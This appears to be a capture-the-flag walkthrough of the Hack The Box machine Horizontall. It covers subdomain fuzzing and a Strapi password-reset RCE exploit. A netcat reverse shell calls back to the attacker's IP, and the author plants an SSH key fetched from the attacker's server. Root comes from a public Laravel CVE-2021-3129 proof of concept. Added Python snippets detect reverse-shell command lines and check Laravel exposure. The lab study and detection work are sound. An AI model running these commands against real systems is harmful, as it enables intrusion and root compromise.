Introduction
Horizontall is an “easy” rated CTF Linux box on the Hack The Box platform. The box covers initial compromise by exploiting a Strapi RCE vulnerability, and privilege escalation by tunneling an internal application (Laravel) to the local machine and running a PoC exploit against Laravel v7.4.18.
Table of Contents
Network Scanning
· nmap
Enumeration
· Subdomain enumeration using wfuzz
· Strapi password reset exploit
Exploitation
· Exploiting Strapi CVE-2019-18818 to gain a reverse shell
· Initial information gathering
· Setting up my SSH key in the victim’s authorized_keys file
Privilege Escalation
· Tunneling the internal website to our system
· Exploiting Laravel CVE-2021-3129 to snag the root flag
Let’s begin
Network Scanning
First, we will run an nmap scan on the victim machine:
nmap -sV -sC -Pn 10.129.149.92
Enumeration
Since there was a website running on port 80, we added the address to our hosts file for resolution.
We looked for exploitable vectors on the website itself but couldn’t find any, which indicated that we needed to enumerate directories.
Even directory enumeration didn’t yield any results, so we tried to enumerate subdomains.
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.horizontall.htb" --sc 200 10.129.149.92
This returned an interesting subdomain called api-prod.
We added this subdomain to the hosts file and tried to open the website.
echo "10.129.149.92 api-prod.horizontall.htb" >> /etc/hosts
It seemed like a plain website with no vectors again, so we tried directory enumeration. We found a directory /admin. Upon checking the components that made up this website, we found the title to be strapi.
whatweb http://api-prod.horizontall.htb/admin/
We observed the response in Burp and noticed the Strapi version to be 3.0.0-beta.17.4.
Exploitation
The Searchsploit result showed us that an exploit for the given version was available. This version was affected by CVE-2019-18818, which allows an attacker to reset the admin password without needing authentication tokens. You can read more about the vulnerability here. We downloaded the exploit using searchsploit.
searchsploit -m 50239
Running the exploit was quite simple; just passing the URL as an argument sufficed.
python3 50239.py http://api-prod.horizontall.htb
As you can see, the password was reset and one could log in with it. The response also confirms that the account is an admin.
However, the exploit also offered an option to run remote commands on the server! After a lot of tries, we found a reverse shell that seemed to work.
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.10 1234 >/tmp/f
We had already set up a listener on port 1234, which now received a new session. We upgraded it to a proper teletype using python.
nc -nlvp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'
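Seen from the blue-team side, the command lines above are exactly what a process-execution log records. The detection logic below is an added example, not part of the original write-up; the rule names are hypothetical and the sample command lines are constructed (only the two attacker commands are the ones shown above), so it runs offline.

```python
import re

# Constructed sample of process command lines, as a defender would collect them
# from auditd EXECVE records or an EDR agent; these are not logs from the box.
SAMPLE_EXECS = [
    "node /srv/strapi/node_modules/.bin/strapi start",
    'sh -c rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.10 1234 >/tmp/f',
    'python3 -c import pty;pty.spawn("/bin/bash")',
    "nc -zv localhost 8000",
    "bash -c ls -la /home/strapi/.ssh",
]

# Each rule keys on the mechanics the shell needs, not on an IP or port: a named
# pipe feeding an interactive shell into a network client, and a pty spawned from
# a one-liner to upgrade a dumb shell. Rule names are hypothetical.
RULES = [
    ("fifo_reverse_shell", re.compile(r"mknod\s+\S+\s+p\b.*\|\s*(nc|ncat|netcat)\b")),
    ("interactive_shell_to_netcat", re.compile(r"/bin/(ba)?sh\s+-i\b.*\|\s*(nc|ncat|netcat)\b")),
    ("pty_spawn_upgrade", re.compile(r"\bpty\.spawn\(")),
]


def classify(cmdline):
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(execs):
    """Map each suspicious command line to its matching rules; clean lines are omitted."""
    return {cmd: classify(cmd) for cmd in execs if classify(cmd)}


if __name__ == "__main__":
    for cmd, names in scan(SAMPLE_EXECS).items():
        print(", ".join(names), "<-", cmd)
```

The plain `nc -zv localhost 8000` port check is deliberately in the sample to show the rules do not fire on netcat alone.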
Privilege Escalation
Upon looking around this server, we observed a few unhelpful things. Finally, a netstat command gave us the path forward. The server seemed to be listening on port 8000, which could mean an internal service was running.
netstat -plant
Since no PID was shown for the port, it means that a service was running; the best bet is a website. Another interesting thing was that the user strapi had rwx permissions on the .ssh directory.
cd ~
ls -la
pwd
cd .ssh
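As an added example that is not part of the original post, here is a small parser for netstat -plant output, run over constructed sample output, that separates loopback-only listeners from the rest and explains the empty PID column noticed above. The sample rows and ports are assumptions, not the box's real output.

```python
import re

# Constructed `netstat -plant` output (not the box's real output): a public web
# server, sshd, a loopback-only service owned by another account, and a
# loopback-only service owned by the caller (so its PID is visible).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1025/node
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""

ROW = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+LISTEN\s+(\S+)")


def parse_listeners(text):
    """Return (proto, address, port, pid_program) for every LISTEN row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            proto, local, _remote, owner = m.groups()
            addr, _, port = local.rpartition(":")
            rows.append((proto, addr, int(port), owner))
    return rows


def loopback_only(rows):
    """Listeners bound to localhost only. They are invisible to a port scan from
    outside, but any foothold on the host reaches them (an SSH -L forward is
    enough), so 'internal only' is not a security boundary."""
    return [r for r in rows if r[1] in ("127.0.0.1", "::1")]


def owner_hidden(rows):
    """Rows whose PID/Program column is '-'. Without root, -p only shows the
    caller's own processes, so '-' means another account owns the listener,
    not that nothing is behind it."""
    return [r for r in rows if r[3] == "-"]


if __name__ == "__main__":
    rows = parse_listeners(SAMPLE_NETSTAT)
    for r in loopback_only(rows):
        print("loopback-only listener:", r)
    for r in owner_hidden(rows):
        print("owner not visible:", r)
```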
Therefore, the plan forward is:
1. Add my own SSH public key to the server’s authorized_keys
2. Start a TCP tunnel to forward port 8000 to my local system
3. Explore the service on port 8000
For this, I generated a new SSH key pair using the ssh-keygen command. I then copied my id_rsa.pub key as authorized_keys and started a web server using python.
ssh-keygen
cp id_rsa.pub authorized_keys
python3 -m http.server 80
I then downloaded this file on the server using wget, into the directory ~/.ssh.
wget http://10.10.16.10/authorized_keys
As it had been copied, we could now run an SSH tunnel and forward port 8000 to our local system’s port 8000 using the command:
ssh -i id_rsa -L 8000:localhost:8000 strapi@10.129.149.92
Now, upon browsing to local port 8000 in the web browser, we observed that Laravel version 7.4.18 was running.
http://localhost:8000
This version is vulnerable to CVE-2021-3129. This vulnerability allows an attacker to execute code because of an insecure implementation of the file_get_contents() function. A PoC is available on GitHub (ref here), which we cloned and ran.
git clone https://github.com/nth347/CVE-2021-3129_exploit.git
cd CVE-2021-3129_exploit
chmod +x exploit.py
./exploit.py http://localhost:8000 Monolog/RCE1 id
./exploit.py http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
And as you can see, the application was owned by root, so we were able to execute commands as root. This is how we escalated our privileges and snagged the root flag.
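From a defender's view, CVE-2021-3129 has two preconditions on a Laravel deployment: the bundled Ignition package is older than 2.5.2 (where it was fixed), and APP_DEBUG is on, because Ignition's debug solutions are only served in debug mode. The check below is an added example, not part of the write-up or of the PoC; the .env and composer.lock contents are constructed, and facade/ignition is the package name Laravel 7/8 used at the time.

```python
import json
import re

# Constructed inputs, not files from the box: a Laravel .env fragment and a
# trimmed composer.lock, as a defender finds them in an application root.
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=production\nAPP_DEBUG=true\nAPP_URL=http://localhost:8000\n"
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "v7.30.4"},
    {"name": "facade/ignition", "version": "2.5.1"},
]})

# CVE-2021-3129 affects Ignition before 2.5.2, and the vulnerable solution
# endpoint is only served while APP_DEBUG is true.
FIXED_IGNITION = (2, 5, 2)

def parse_env(text):
    """Parse KEY=VALUE lines of a .env file, skipping blanks and comments."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip("\"'")
    return env

def version_tuple(version):
    """'v2.5.1' -> (2, 5, 1); any non-numeric parts are dropped."""
    return tuple(int(p) for p in re.findall(r"\d+", version))

def ignition_version(lock_text):
    """Installed facade/ignition version from composer.lock, or None."""
    for pkg in json.loads(lock_text).get("packages", []):
        if pkg.get("name") == "facade/ignition":
            return pkg.get("version")
    return None

def assess(env_text, lock_text):
    """Findings that together make CVE-2021-3129 reachable on this deployment."""
    findings = []
    if parse_env(env_text).get("APP_DEBUG", "false").lower() == "true":
        findings.append("APP_DEBUG=true: Ignition debug pages are served to clients")
    ver = ignition_version(lock_text)
    if ver and version_tuple(ver) < FIXED_IGNITION:
        findings.append("facade/ignition %s is older than the fixed 2.5.2" % ver)
    return findings

if __name__ == "__main__":
    for f in assess(SAMPLE_ENV, SAMPLE_LOCK):
        print("finding:", f)
```

Either finding on its own is worth fixing: turning APP_DEBUG off closes the exploit path immediately, and updating the package removes the bug itself.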
Conclusion
The lab offers practical experience in googling, understanding and running public exploits against a server. In our humble opinion, the box is suitable for beginners or students practising for OSCP. Hope you liked the article. Thanks for reading.